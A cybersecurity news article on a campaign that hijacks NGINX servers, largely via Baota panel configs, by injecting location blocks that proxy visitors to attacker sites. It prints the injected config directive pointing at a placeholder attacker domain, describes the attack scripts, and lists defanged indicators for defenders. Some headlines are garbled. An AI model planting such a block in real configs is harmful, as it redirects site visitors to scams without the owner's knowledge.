Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
Shai-Hulud Worm Steals Developer Secrets from GitHub Kubernetes
May 15, 2026
Hackers Abuse OAuth Flow to Steal Microsoft Device Authorization
May 15, 2026
Microsoft Edge, Windows 11, LiteLLM H Hacked Pwn2Own
May 15, 2026
Home/CyberSecurity News/Hackers Redirect NGINX Traffic to Mal Threat Actors
CyberSecurity News

Hackers Redirect NGINX Traffic to Mal Threat Actors

Threat actors are stealthily compromising NGINX servers in a sophisticated campaign designed to redirect web traffic to malicious destinations. The attackers, previously linked to “React2Shell”...

Marcus Rodriguez
Marcus Rodriguez
February 5, 2026 2 Min Read
5 0

Threat actors are stealthily compromising NGINX servers in a sophisticated campaign designed to redirect web traffic to malicious destinations.

The attackers, previously linked to “React2Shell” exploits, are now targeting NGINX configurations, specifically those using the Baota (BT) management panel, widely used in Asia.

How the Attack Works

Instead of installing traditional malware, these attackers modify the server’s legitimate configuration files.

By injecting malicious directives into NGINX’s location blocks, they can intercept user traffic and route it through attacker-controlled servers without the site owner noticing immediately.

NGINX attack flow diagram (source : Datadog Security Labs)
NGINX attack flow diagram (source: Datadog Security Labs)

The core of the attack relies on the proxy_pass directive. This standard NGINX feature is designed to forward traffic to backend servers (like a PHP application).

The campaign uses a straightforward, automated workflow involving several shell scripts:

Script Name Role Primary Function Target
zx.sh The Orchestrator Initializes environment and downloads required tools Acts as entry point for the attack chain
bt.sh Baota Injector Scans for Baota panel configs and injects malicious code Targets /www/server/panel/vhost/nginx
4zdh.sh Advanced Injection Injects payload into NGINX configs after validation Targets generic Linux NGINX installs
zdh.sh Advanced Injection Same as 4zdh.sh with config verification Collects and uploads the hijacked domain list
ok.sh Exfiltration Acts as an entry point for the attack chain Sends data to attacker C2 server

However, the attackers reconfigure it to send users to their own malicious domains, such as gambling or scam sites.

They also use proxy_set_header to ensure the hijacked traffic retains legitimate-looking headers, making the redirection harder to detect in standard logs.


location /%PATH%/ {
    set $fullurl "$scheme://$host$request_uri";
    rewrite ^/%PATH%/?(.*)$ /index.php?domain=$fullurl&$args break;
    proxy_set_header Host [Attacker_Domain];
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    proxy_set_header X-Forwarded-Proto $scheme;
    proxy_set_header User-Agent $http_user_agent;
    proxy_set_header Referer $http_referer;
    proxy_ssl_server_name on;
    proxy_pass http://[Attacker_Domain];
}

The campaign heavily targets Asian Top-Level Domains (TLDs) like .in, .id, .th, and .bd, as well as government (.gov) and educational (.edu) websites.

Datadog Security Research advises administrators to check their NGINX configuration files for unexpected proxy_pass directives pointing to the following known malicious domains:​

Indicator Type Value Threat Category Status Notes
Domain xzz.pier46[.]com Suspected C2 / Malware Infrastructure Active (unverified) Observed in malicious campaign
Domain ide.hashbank8[.]com Suspected C2 / Malware Infrastructure Active (unverified) Used for attacker communications
Domain th.cogicpt[.]org Suspected C2 / Malware Infrastructure Active (unverified) Potential exfiltration endpoint

Additionally, network logs showing traffic to IP 158.94.210[.]227 indicate active communication with the attackers’ infrastructure.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackExploitHackerMalwareSecurityThreat

Share Article

Marcus Rodriguez

Marcus Rodriguez

Marcus is a security researcher and investigative journalist with expertise in vulnerability research, bug bounties, and cloud security. Since 2017, Marcus has been breaking stories on critical vulnerabilities affecting major platforms. His investigative work has led to the disclosure of numerous security flaws and improved defenses across the industry. Marcus is an active participant in bug bounty programs and has been recognized for responsible disclosure practices. He holds multiple security certifications and regularly speaks at industry events.

Previous Post

DesckVB RAT: Multi-stage Infection & Chain Plugin-Based

Next Post

Beware of Weaponized Voicemail Messages that Allows Hackers to

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Tycoon 2FA Operators Use OAuth Phishing to Bypass Adopt Device
May 15, 2026
Critical cPanel Flaws Allow Access to Sensitive System
May 15, 2026
Amazon Redshift JDBC Driver Flaws Allow Remote Code Execution
May 15, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Sarah simpson
Sarah simpson
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Detects Critical MongoDB CVE-

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us